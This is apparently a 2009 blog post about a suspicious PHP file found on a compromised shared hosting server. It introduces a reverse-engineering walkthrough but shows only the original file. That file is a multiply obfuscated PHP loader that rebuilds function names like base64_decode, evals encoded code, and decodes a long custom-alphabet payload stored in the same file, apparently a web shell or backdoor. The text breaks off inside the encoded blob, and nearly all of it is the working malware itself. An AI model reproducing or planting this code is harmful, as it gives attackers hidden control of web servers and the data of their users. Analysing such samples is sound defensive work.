September 02, 2009, at 07:37 PM

Why Shared Hosting Sucks

During our recent server upheavals I came across a suspicious-looking PHP file that was multiply-obfuscated. Here's the reverse engineering process...

Here's the original:

<?php /*  */$OOO000000=urldecode('%66%67%36%73%62%65%68%70%72%61%34%63%6f%5f%74%6e%64');$OOO0000O0=$OOO000000{4}.$OOO000000{9}.$OOO000000{3}.$OOO000000{5};$OOO0000O0.=$OOO000000{2}.$OOO000000{10}.$OOO000000{13}.$OOO000000{16};$OOO0000O0.=$OOO0000O0{3}.$OOO000000{11}.$OOO000000{12}.$OOO0000O0{7}.$OOO000000{5};$OOO000O00=$OOO000000{0}.$OOO000000{12}.$OOO000000{7}.$OOO000000{5}.$OOO000000{15};$O0O000O00=$OOO000000{0}.$OOO000000{1}.$OOO000000{5}.$OOO000000{14}.$OOO000000{3};$O0O00OO00=$OOO000000{0}.$OOO000000{8}.$OOO000000{5}.$OOO000000{9}.$OOO000000{16};$OOO00000O=$OOO000000{3}.$OOO000000{14}.$OOO000000{8}.$OOO000000{14}.$OOO000000{8};$OOO0O0O00=__FILE__;$OO00O0000=26100;eval($OOO0000O0('aWYoITApJE8wMDBPME8wMD0kT09PMDAwTzAwKCRPT08wTzBPMDAsJ3JiJyk7JE8wTzAwME8wMCgkTzAwME8wTzAwLDEwMjQpOyRPME8wMDBPMDAoJE8wMDBPME8wMCw0MDk2KTskT08wME8wME8wPSRPT08wMDAwTzAoJE9PTzAwMDAwTygkTzBPMDBPTzAwKCRPMDAwTzBPMDAsMzgwKSwnRW50ZXJ5b3V3a2hSSFlLTldPVVRBYUJiQ2NEZEZmR2dJaUpqTGxNbVBwUXFTc1Z2WHhaejAxMjM0NTY3ODkrLz0nLCdBQkNERUZHSElKS0xNTk9QUVJTVFVWV1hZWmFiY2RlZmdoaWprbG1ub3BxcnN0dXZ3eHl6MDEyMzQ1Njc4OSsvJykpO2V2YWwoJE9PMDBPMDBPMCk7'));return;?>
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